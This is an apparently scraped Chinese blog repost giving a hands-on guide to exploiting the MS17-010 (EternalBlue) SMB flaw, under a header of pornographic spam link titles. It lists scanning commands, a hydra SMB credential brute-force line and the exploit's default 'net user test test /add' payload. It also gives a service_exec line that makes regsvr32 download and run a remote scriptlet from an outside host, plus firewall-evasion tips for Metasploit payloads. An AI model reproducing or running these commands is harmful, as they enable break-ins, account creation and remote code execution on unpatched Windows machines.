日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

ms17-010 php版本,那年MS17-010

發布時間:2025/3/15 php 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ms17-010 php版本,那年MS17-010 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

掃描腳本匯總

PHP腳本:

批量掃描:

MSF的:

或者也可以:

smb_ms17_010.rb缺省只掃445/TCP。如果想掃139/TCP,必須:

set SMBDirect false

set RPORT 139

或者

unset SMBDirect

set RPORT 139

NMAP的:

nmap --script smb-vuln-ms17-010 -p445 x.x.x.x

漏洞利用

worawit/MS17-010

https://github.com/worawit/MS17-010

這個腳本其實在nas放出一個月就公開再Exploit-db了,很多人估計都不知道..

那么,查看zzz_exploit.py腳本會看到?from mysmb import MYSMB?之前有人使用python釣魚:mysmb,其實真正安裝了這個模塊的人其實這個腳本反倒會利用失敗.并且把信息發送給釣魚者

依賴項

pipe

經常執行腳本會發現報錯.如下所示

你可能需要的pipe

那么直接通過?python zzz_exploit.py [pipe_name]?即可

當然有些時候沒有設置username和password,并且共享中啟動了密碼訪問..也會導致這個問題

或者可以通過

auxiliary/scanner/smb/pipe_auditor 模塊找尋你需要的pipe

username and password

USERNAME = ''

PASSWORD = ''

只需要更改系統中存在的共享smb賬戶,無論權限多低

那么我們怎么找到對應的賬戶呢,使用如下兩種,當然使用自己寫python腳本更佳啊

hydra -L user.txt -P pass.txt -t 20 10.10.10.10 smb

注意: 此腳本最關鍵地方

如果測試成功,會發現c盤新建了一個pwned.txt文件,同時會執行命令net user test test /add

如果覺得繁瑣,可以用powershell/regsvr32等等執行腳本內容

在python代碼更改成如下即可

service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll')

Eternalblue-Doublepulsar-Metasploit

修改eternalblue_doublepulsar.rb中成自己的目錄,修改完成后,我們將rb文件放到metasploit的目錄exploit/windows/smb/

啟動msf后使用reload_all命令重新加載模塊

ms17_010_eternalblue

至于防火墻可以通過https和dns的payload走就行了

ms17_010_psexec

全版本通殺,至于為什么.因為有依賴條件.必須是禁止密碼保護共享的

本文參考此文整理

總結

以上是生活随笔為你收集整理的ms17-010 php版本,那年MS17-010的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。